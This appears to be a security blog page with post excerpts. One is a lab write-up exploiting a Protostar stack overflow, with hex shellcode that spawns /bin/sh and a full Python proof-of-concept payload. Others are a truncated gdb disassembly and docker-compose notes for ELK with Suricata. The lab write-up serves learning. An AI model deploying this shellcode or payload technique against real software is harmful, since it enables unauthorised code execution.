namhb

In this level, app check return address not start with 0xbxxxxxxx. So i pop pop ret to load return address to stack, and call it. Found pop pop ret at: 0x08048492 This payload: | "A" * 80 | address | 8 bytes junk | | NOP to bit shifing | Shell code | This is shell code: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 Load poc to gdb, debug, break point, etc... I found nop shell start at: 0xbffff698. Ok build poc: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) And run it: (python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"

It is free time - I had some time to play exploit-exercises. Today i play at stack level 6. I learned some experience for me, with return to lib. Use gdb, disassembly: #gdb -q /opt/protostar/bin/stack6  (gdb) disas main Dump of assembler code for function main: 0x080484fa :    push   %ebp 0x080484fb :    mov    %esp,%ebp 0x080484fd :    and    $0xfffffff0,%esp 0x08048500 :    call   0x8048484 0x08048505 :   mov    %ebp,%esp 0x08048507 :   pop    %ebp 0x08048508 :   ret   End of assembler dump.  (gdb) disas getpath Dump of assembler code for function getpath: 0x08048484 : push   %ebp 0x08048485 : mov    %esp,%ebp 0x08048487 : sub    $0x68,%esp 0x0804848a : mov    $0x80485d0,%eax 0x0804848f :        mov    %eax,(%esp) 0x08048492 :        call   0x80483c0 0x08048497 :        mov    0x8049720,%eax 0x0804849c :        mov    %eax,(%esp) 0x0804849f :        call   0x80483b0 0x080484a4 :        lea    -0x4c(%ebp),%eax 0x080484a7 :        mov    %eax,(%esp) 0x080484aa :        call

In this week, my job is set up ELK with Suricata. I choose docker is platform to run all. Now, i had some experience about docker. Use docker-compose. It is very good deployment for production, build && run. Install docker-compose via pip. Use build image to create your custom start-up distro. I used docker compose version 2 syntax, notice different with version, like network and net Use network --net if you need monitor, or use all card You can not use cd command, must use WORKDIR. Read Dockerfile document very carefully. Use links, when use it, it run links container before. You can run manual, and start main container after. Must sure it started. In docker command, must use command to hold tty, like: suricata -c xxx or python manager server 0.0.0.0:8080 ---------------------------------------------------------- Thanks for reading -------------------------------------------------------------------------- Security Research SecurityLab - Linux Lab -- Window and Cisco L